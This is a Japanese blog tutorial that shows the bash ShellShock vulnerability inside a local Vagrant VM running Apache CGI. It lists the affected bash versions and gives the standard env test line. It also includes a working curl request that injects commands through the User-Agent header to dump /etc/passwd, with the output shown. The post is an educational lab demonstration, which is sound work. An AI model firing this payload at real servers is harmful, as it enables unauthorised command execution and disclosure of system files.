Vagrantですぐに体験するbashのShellShock脆弱性の恐さ

  • 25
    いいね
  • 3
    コメント
この記事は最終更新日から1年以上が経過しています。

ShellShockこわい

bashの脆弱性。ShellShockというのが方々で騒ぎになっています。
説明を読むだけでも背筋が凍るのですが、実際どんなことが起きるかVagrantを使って試してみましょう。

体験してみる

Vagrantの準備

githubからVagrantfileなどをcloneします。

Vagrantfileをclone
git clone https://github.com/ariarijp/vagrant-shellshock.git

cloneが終わったらそのディレクトリーに移動して

Vagrantfileがあるディレクトリーにcd
cd vagrant-shellshock

VMを起動します

VMを起動
vagrant up

もろもろプロビジョニングされますが主にやっていることはApacheのインストールとCGIの有効化です。

VMが起動したら準備完了です。

恐怖のコマンド

まずはVMにSSHログインします。

VMにログイン
vagrant ssh

ログインできたら、以下のコマンドを実行します。このコマンドでは特に問題はありません。

問題が起きないリクエスト
curl http://localhost/cgi-bin/shellshock.cgi
実行結果
ShellShock!

bashに脆弱性があることも確認しておきましょう。

まずはバージョンの確認から。

バージョンの確認
bash --version
GNU bash, version 4.2.24(1)-release (i686-pc-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

影響を受けるバージョン以下となっており、4.2.24は影響を受けるバージョンであることが確認できます。

  • Bash 4.3 Patch 25 およびそれ以前
  • Bash 4.2 Patch 48 およびそれ以前
  • Bash 4.1 Patch 12 およびそれ以前
  • Bash 4.0 Patch 39 およびそれ以前
  • Bash 3.2 Patch 52 およびそれ以前
  • Bash 3.1 Patch 18 およびそれ以前
  • Bash 3.0 Patch 17 およびそれ以前

引用:GNU bash の脆弱性に関する注意喚起

次に脆弱性を確認するためのお決まりのコマンドも確認しておきましょう。

脆弱性の確認
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
実行結果
vulnerable
this is a test

次に以下のコマンドを実行します。

恐怖のコマンド
curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://localhost/cgi-bin/shellshock.cgi

実行結果はこんな感じです。これは。。

実行結果
curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://localhost/cgi-bin/shellshock.cgi
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ntp:x:103:108::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vagrant:x:1000:1000:vagrant,,,:/home/vagrant:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
statd:x:105:65534::/var/lib/nfs:/bin/false

ちなみにshellshock.cgiの中身はこんな感じです。単純にヘッダーと本文をechoしているだけなのですが。。

shellshock.cgi
#!/bin/bash
echo "Content-type: text/plain"
echo
echo "ShellShock!"

まとめ

使用しているbashのバージョンだけでなく、CGIの使用有無などによっても影響度は異なります。
JPCERTなどの信用できる情報を参考に対策を行いましょう。

ShellShockこわいです。

参考サイト